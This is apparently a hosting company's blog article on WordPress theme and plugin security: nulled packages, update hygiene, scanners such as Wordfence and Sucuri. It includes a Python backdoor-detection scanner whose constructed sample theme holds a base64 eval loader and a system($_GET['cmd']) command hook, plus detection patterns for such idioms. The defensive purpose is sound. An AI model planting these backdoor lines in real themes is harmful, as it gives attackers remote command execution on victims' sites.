Guard Against WordPress Vulnerabilities With Scanners, Theme & Plugin Security Best Practices

If it seems as if WordPress websites are hacked more often than others, there is some truth to it. WordPress vulnerabilities are common: in its report on the first three months of 2016, the security firm Sucuri investigated 11,485 compromised sites and found that 78% of them ran on WordPress.

Granted, WordPress is the most popular and widely used CMS platform, and the Sucuri figure is a share of compromised sites, not a hack rate, so market share alone explains much of why WordPress outnumbers, say, Joomla, which accounted for 14% of the compromised sites in the study. But that same prevalence (WordPress publishes 58.3 million new posts each month) also makes it the top target for attackers, and a vulnerability in a popular plugin is worth exploiting at scale. Its many users are therefore at risk.

Themes and Plugins: A Hotbed for WordPress Vulnerabilities

Two of the biggest sources of WordPress vulnerabilities are themes and plugins. They serve as gateways for attackers, who know that many users don't think twice about where a theme or plugin comes from, especially if it is free.

Earlier this year, the company Elegant Themes issued a security alert for vulnerabilities it had found in two of its themes and three of its plugins. The flaws would have allowed attackers to change site content and plugin settings, damaging business reputations, running up repair costs, and potentially giving the attacker a platform from which to spam other sites.

But at least Elegant Themes' users had a warning; in other cases, attackers often inflict damage long before anyone finds out. All of the WordPress sites that Sucuri analyzed earlier this year showed the attackers' intrusion points were inside plugins.

For Your Information:

A quarter of the attacks analyzed by Sucuri were attributed to three plugins: RevSlider, GravityForms, and TimThumb. TimThumb isn't exactly a plugin on its own; it is a PHP image-resizing script that many themes and plugins bundle, and it has provided openings for attackers in the past. That bundling is the security point: a copy of a library shipped inside a theme is only as current as the theme that carries it, so a fix in the library protects nothing until every theme and plugin that embeds it is updated too.

Be Vigilant: There Are Trustworthy and Dubious Offerings

Themes and plugins should not be treated as afterthoughts. Many run to thousands of lines of code, and an attacker needs only one of those lines to plant a backdoor that compromises the whole WordPress site.

Themes and plugins from the WordPress.org directory are a reasonable default. Submissions receive an initial review, plugins with reported vulnerabilities can be closed or forced to update, and the ones with high ratings and recent updates are usually safe to install. WordPress and reputable theme and plugin vendors announce discovered vulnerabilities and release updates to patch them; their business depends on users trusting them. That review is not a security audit, though: vulnerable plugins are still found in the directory regularly, which is why scanning and prompt updating matter even for "official" downloads.

Nulled plugins and themes are another story. These are pirated copies of premium plugins and themes, redistributed without payment to the vendor. Rather than pay for the originals, many users download the nulled versions. With these you often get what you didn't pay for: a backdoor, hidden spam links, and injected ads, just to name a few unwanted bonuses. Even an untampered nulled copy has no licence and therefore no update channel, so it drifts out of date and stays vulnerable to anything the vendor has since fixed.
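The backdoors and hidden links described above tend to look alike across nulled packages, so a small indicator scan catches many of them before the files go anywhere near a live site. The following is an added example, not code from the original article, Wordfence or Sucuri; the indicator list is a hand-picked handful of patterns, not a complete signature set, and the two PHP packages it scans are constructed samples (a clean widget and a tampered theme) embedded inline.

```python
"""Heuristic scan of theme/plugin PHP for common nulled-package payloads.

Added example. The indicators are deliberately narrow to keep false positives
low; a hit is a reason to read the file, not proof of compromise.
"""
import re

# (label, pattern). Each pattern targets one well-known backdoor idiom.
INDICATORS = [
    ("eval of decoded payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("command/eval on request data",
     re.compile(r"\b(?:eval|assert|system|exec|shell_exec|passthru)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace with /e modifier (code execution)",
     re.compile(r"\bpreg_replace\s*\(\s*['\"](.)[^'\"]*?\1[a-z]*e[a-z]*['\"]", re.I)),
    ("runtime function creation",
     re.compile(r"\bcreate_function\s*\(", re.I)),
    ("hidden outbound link",
     re.compile(r"display\s*:\s*none[^>]*>\s*<a\b", re.I)),
    ("long base64 literal",
     re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")),
]


def scan_source(source):
    """Return (label, line_number) pairs for every indicator hit in one file."""
    hits = []
    for label, pattern in INDICATORS:
        for match in pattern.finditer(source):
            line_no = source.count("\n", 0, match.start()) + 1
            hits.append((label, line_no))
    return sorted(hits, key=lambda hit: hit[1])


def scan_package(files):
    """files: {relative_path: php_source}. Returns {path: hits} for files with hits."""
    report = {}
    for path, source in files.items():
        hits = scan_source(source)
        if hits:
            report[path] = hits
    return report


# Constructed sample: a plugin with nothing suspicious in it.
CLEAN_PLUGIN = {
    "clean-widget/clean-widget.php": """<?php
/* Plugin Name: Clean Widget (constructed sample) */
function clean_widget_init() {
    register_widget('Clean_Widget');
}
add_action('widgets_init', 'clean_widget_init');
""",
}

# Constructed sample: a nulled theme with a decode-and-run loader, a
# request-driven command hook and a hidden spam link in the footer.
NULLED_THEME = {
    "nulled-theme/functions.php": """<?php
/* Theme functions (constructed sample of a tampered copy) */
function nulled_theme_setup() {
    add_theme_support('title-tag');
}
add_action('after_setup_theme', 'nulled_theme_setup');
// Injected: decode-and-run loader
eval(base64_decode("ZWNobyAnaGknOw=="));
// Injected: remote command execution hook
if (isset($_GET['cmd'])) { system($_GET['cmd']); }
""",
    "nulled-theme/footer.php": """<footer>
<div style="display:none"><a href="http://example.com/cheap-pills">cheap pills</a></div>
</footer>
""",
}

if __name__ == "__main__":
    for name, package in (("clean", CLEAN_PLUGIN), ("nulled", NULLED_THEME)):
        print(name, scan_package(package))
```

Run it against an unpacked zip by reading each `.php` file into the `files` dict before calling `scan_package`. Obfuscated loaders that split strings or use `chr()` chains will slip past these six patterns, which is why the scan complements, rather than replaces, comparing files against a known-good copy.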

Always Verify and Update

Before installing, verify where a theme or plugin comes from. Don't just hit "install", and instruct your clients to do the same. If you are not sure which plugins and themes to trust, reputable third parties audit popular ones for security. Pay attention to reviews, ratings, and how often the plugin or theme is updated: if other users report problems, or it hasn't been updated in years, be wary.
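Those "be wary" signals can be checked automatically before anything is installed. The block below is an added example, not code from the original article or from WordPress.org: it evaluates a policy over the kind of metadata the WordPress.org plugin info API returns (`https://api.wordpress.org/plugins/info/1.0/<slug>.json`). The field names used here (`last_updated`, `tested`, `rating` as a 0 to 100 percentage, `num_ratings`, `active_installs`), the date format, and all thresholds are assumptions to confirm against a live response; the two plugin records are constructed samples.

```python
"""Pre-install sanity check on a plugin's directory metadata (added example).

Input shape assumed to mirror a few fields of the WordPress.org plugin info
API; verify the field names and formats against a real response before use.
"""
from datetime import date

# Policy thresholds (assumed values; tune per client).
MAX_AGE_DAYS = 365            # no release in a year: the maintainer may be gone
MIN_RATING = 80               # rating is assumed to be a 0-100 percentage
MIN_NUM_RATINGS = 20          # a perfect score from a handful of voters is noise
MIN_ACTIVE_INSTALLS = 1000    # tiny install base means few eyes on the code

# Constructed audit context: the date of the check and the WordPress release
# the client runs.
AUDIT_DATE = date(2016, 5, 10)
CURRENT_WP = "4.5.2"


def parse_last_updated(value):
    """Assumed API format '2016-04-12 3:05pm GMT'; only the date part is used."""
    return date.fromisoformat(value[:10])


def version_tuple(version):
    return tuple(int(part) for part in version.split("."))


def assess_plugin(info, today, current_wp):
    """Return human-readable policy warnings; an empty list means no hits."""
    warnings = []

    age = (today - parse_last_updated(info["last_updated"])).days
    if age > MAX_AGE_DAYS:
        warnings.append(f"last update {age} days ago (limit {MAX_AGE_DAYS})")

    # 'tested' is the newest WordPress version the author claims compatibility
    # with; compare major.minor only, since patch releases rarely break plugins.
    tested = info.get("tested")
    if not tested or version_tuple(tested)[:2] < version_tuple(current_wp)[:2]:
        warnings.append(f"not tested with WordPress {current_wp} (tested: {tested or 'unknown'})")

    # A rating is only meaningful once enough people have voted.
    num_ratings = info.get("num_ratings", 0)
    if num_ratings < MIN_NUM_RATINGS:
        warnings.append(f"only {num_ratings} ratings, the score is not meaningful")
    elif info.get("rating", 0) < MIN_RATING:
        warnings.append(f"rating {info['rating']}/100 is below {MIN_RATING}")

    installs = info.get("active_installs", 0)
    if installs < MIN_ACTIVE_INSTALLS:
        warnings.append(f"only {installs} active installs")

    return warnings


# Constructed samples shaped like trimmed API responses.
STALE_PLUGIN = {
    "name": "Old Slider",
    "last_updated": "2013-09-02 7:41am GMT",
    "tested": "3.6.1",
    "rating": 92,
    "num_ratings": 7,
    "active_installs": 300,
}
HEALTHY_PLUGIN = {
    "name": "Maintained Forms",
    "last_updated": "2016-04-28 1:10pm GMT",
    "tested": "4.5.1",
    "rating": 94,
    "num_ratings": 812,
    "active_installs": 400000,
}


def demo():
    """Assess both samples against the constructed audit context."""
    return {
        "stale": assess_plugin(STALE_PLUGIN, AUDIT_DATE, CURRENT_WP),
        "healthy": assess_plugin(HEALTHY_PLUGIN, AUDIT_DATE, CURRENT_WP),
    }


if __name__ == "__main__":
    for name, warnings in demo().items():
        print(name, warnings or "no policy hits")
```

A plugin that trips the "stale" checks is not necessarily malicious, but it is exactly the kind of abandoned code that the TimThumb and RevSlider incidents were built on, so treat a non-empty list as a reason to look for an alternative.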

There are a few plugins that we do recommend to help protect against WordPress vulnerabilities. Wordfence, for example, runs a server-side scan of your site's source files and compares them with the official copies in the WordPress.org repository of core, themes and plugins, so a modified or added file stands out. Sucuri's scanner checks for malware, website errors and out-of-date software, and reports whether the site appears on any blacklists.

Also, the open-source WPScan Vulnerability Database offers detailed breakdowns of the latest WordPress vulnerabilities, including plugin and theme weaknesses. The site is comprehensive, updated frequently, and maintained by security testers and "good" hackers; checking it for the plugins on a client's site is a quick way to find out whether an installed version has a known issue.

Don't forget: it's important to update themes and plugins regularly! This won't guarantee that your clients' sites are immune to attackers, but when a plugin or theme has a security vulnerability its maintainer should release a patched version, and that fix protects nobody until it is actually installed.

WordPress security has many moving parts, and it's hard to stay on top of them all. Vulnerabilities arise often, and stories about hacks are published frequently. Don't let your clients become the victim featured in one of those stories. Download reputable themes and plugins, check them before installing, and update them regularly. These simple steps go a long way toward keeping your clients' WordPress sites safe.

Want WordPress without the hassle? Check out WordPress Without Limits, a managed WordPress solution, with one-click staging, one-click backup restoration, automatic updates, automatic backups, and free SSL.